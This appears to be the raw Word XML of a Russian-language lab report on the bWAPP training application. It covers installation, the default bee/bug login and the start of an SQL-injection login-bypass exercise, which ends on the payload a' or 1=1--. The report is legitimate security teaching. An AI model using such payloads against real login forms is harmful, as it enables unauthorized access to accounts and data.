    <w:p w14:paraId="4A93FF2E" w14:textId="7A691488" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь достаточно перейти на страницу </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tooltip="http://localhost/install.php" w:history="1">
        <w:r>
          <w:rPr>
            <w:lang w:val="ru-RU"/>
          </w:rPr>
          <w:t>http://localhost/install.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и кликнуть «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>в надписи «</w:t>
      </w:r>
      <w:r>
        <w:t>Click here to install bWAPP.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C459726" w14:textId="77777777" w:rsidR="002F695F" w:rsidRDefault="002F695F" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB1758F" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Image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BDA25C" wp14:editId="060A485E">
                <wp:extent cx="5940425" cy="3876220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09282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876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05.2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74F7AD5D" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок 2.1. Окно приветствия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC2AE63" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A8F17E" w14:textId="78530975" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Если все получилось, откроется основная страничка (рис. 2.2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249EC7F0" w14:textId="77777777" w:rsidR="002F695F" w:rsidRDefault="002F695F" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73454D55" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Image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86E051" wp14:editId="7858622A">
                <wp:extent cx="5940425" cy="3852616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74498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852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03.3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44B4988F" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок 2.2. Стартовая станица.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4D8854" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C73EB50" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>На стартовой странице можно наблюдать меню с несколькими кнопками:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46172C03" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218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Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>перенаправляет на страницу авторизации;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020041AA" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218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New</w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">» – страница для создания нового пользователя (это делать необязательно, существуют стандартные логин и пароль: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bee</w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE3D0AD" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218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Info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">» – рассказывает о проекте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bWAPP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C96659" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218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Tasks &amp; Tranning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">смежные проекты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bWAPP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D684B96" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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Blog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>переход на блог авторов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45287882" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CA3E3DA" w14:textId="1407771B" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Для дальнейшей работы необходимо перейти во вкладку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">и ввести логин: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и пароль: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Уровень сложности оставить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>. После прохождения авторизации открывается портал с выбором заданий (рис. 2.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D710CF0" w14:textId="77777777" w:rsidR="002F695F" w:rsidRDefault="002F695F" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7668E6C0" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Image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BAE4EF" wp14:editId="29ED9272">
                <wp:extent cx="5940425" cy="3843530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3768138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843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302.6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31695BAC" w14:textId="24EF5839" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок 2.3. Портал с заданиями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D184938" w14:textId="77777777" w:rsidR="00345222" w:rsidRDefault="00345222" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D24102" w14:textId="5EAE51DD" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60877994" w14:textId="54AA9FE4" w:rsidR="00A90600" w:rsidRDefault="00A90600" w:rsidP="00975DE2">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc182315630"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:t>Решение задач</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="2736A863" w14:textId="77777777" w:rsidR="0061100C" w:rsidRPr="0061100C" w:rsidRDefault="0061100C" w:rsidP="0061100C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc182315631"/>
      <w:r w:rsidRPr="0061100C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="0061100C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection (Login Form/Hero)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="3BD8DAB7" w14:textId="750A53FC" w:rsidR="0061100C" w:rsidRDefault="0061100C" w:rsidP="0061100C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Необходимо</w:t>
      </w:r>
      <w:r w:rsidRPr="0061100C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>открыть</w:t>
      </w:r>
      <w:r w:rsidRPr="0061100C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bugs &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0061100C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0061100C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection (Login Form/Hero)</w:t>
      </w:r>
      <w:r w:rsidRPr="0061100C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Откроется станица с заданием.</w:t>
      </w:r>
      <w:r w:rsidR="00975DE2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Здесь можно наблюдать форму логина и предложение ввести данные для авторизации (рис. 3.1.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2844F40B" w14:textId="77777777" w:rsidR="002F695F" w:rsidRPr="0061100C" w:rsidRDefault="002F695F" w:rsidP="0061100C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C4CE56" w14:textId="48500AD5" w:rsidR="00A90600" w:rsidRDefault="00975DE2" w:rsidP="00975DE2">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975DE2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="033BC632" wp14:editId="1E3091A4">
            <wp:extent cx="5940425" cy="25654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6771" w14:textId="1D1C3E7F" w:rsidR="00975DE2" w:rsidRDefault="00975DE2" w:rsidP="00975DE2">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок</w:t>
      </w:r>
      <w:r w:rsidRPr="00975DE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.1.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00975DE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0061100C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection (Login Form/Hero)</w:t>
      </w:r>
      <w:r w:rsidRPr="00975DE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9652B2" w14:textId="77777777" w:rsidR="00345222" w:rsidRDefault="00345222" w:rsidP="00975DE2">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166FD865" w14:textId="5F630548" w:rsidR="00975DE2" w:rsidRDefault="00975DE2" w:rsidP="00975DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Становится нажав </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00975DE2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">и исследовав код, становится понятно, что форма принимает 2 параметра </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ligin</w:t>
      </w:r>
      <w:r w:rsidRPr="00975DE2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password</w:t>
      </w:r>
      <w:r w:rsidRPr="00975DE2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>(рис. 3.1.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CE913E" w14:textId="1B093E1A" w:rsidR="00975DE2" w:rsidRDefault="00975DE2" w:rsidP="00975DE2">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975DE2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51C24D8A" wp14:editId="4198FDFE">
            <wp:extent cx="5940425" cy="43662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06B" w14:textId="219D3F93" w:rsidR="00975DE2" w:rsidRDefault="00975DE2" w:rsidP="00975DE2">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок 3.1.2. Форма запроса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289CA96B" w14:textId="77777777" w:rsidR="00345222" w:rsidRDefault="00345222" w:rsidP="00975DE2">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E98FAA9" w14:textId="32FD6C02" w:rsidR="00975DE2" w:rsidRDefault="00345222" w:rsidP="00975DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Введя случайные символы получаем сообщение об ошибке (рис. 3.1.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F254651" w14:textId="77777777" w:rsidR="002F695F" w:rsidRDefault="002F695F" w:rsidP="00975DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC8B380" w14:textId="1616D25C" w:rsidR="00345222" w:rsidRDefault="00345222" w:rsidP="00345222">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B89DAB0" wp14:editId="6840B96F">
            <wp:extent cx="5940425" cy="25984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D0A4" w14:textId="77BD99E5" w:rsidR="00345222" w:rsidRDefault="00345222" w:rsidP="00345222">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок 3.1.3. Сообщение об ошибке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC5DB01" w14:textId="246F9619" w:rsidR="00345222" w:rsidRDefault="00345222" w:rsidP="00345222">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67DE03AA" w14:textId="0C0BB48D" w:rsidR="00345222" w:rsidRDefault="00345222" w:rsidP="00345222">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Подобные формы отправляют данные на сервер, где происходит обработка с использованием базы данных. Можем предположить, что существует запрос, который проверяет наличие пользователя и правильность пароля:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381A4FB4" w14:textId="146D0AF3" w:rsidR="00345222" w:rsidRDefault="00345222" w:rsidP="00345222">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> users </w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">login </w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_input&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> password </w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'&lt;password_input&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="00345222">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3649CAFE" w14:textId="0A36C0CA" w:rsidR="00345222" w:rsidRDefault="00345222" w:rsidP="00345222">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718EB39C" w14:textId="04DFAE86" w:rsidR="00345222" w:rsidRDefault="009F2397" w:rsidP="00345222">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Предположим, что введенные символы не экранируются и проведем атаку, введя </w:t>
      </w:r>
      <w:r w:rsidR="00D73D41">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>в поля формы код:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1436F265" w14:textId="31CCF783" w:rsidR="00D73D41" w:rsidRPr="00D73D41" w:rsidRDefault="00D73D41" w:rsidP="00D73D41">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D73D41">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D73D41">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D73D41">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00D73D41">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1--</w:t>
      </w:r>
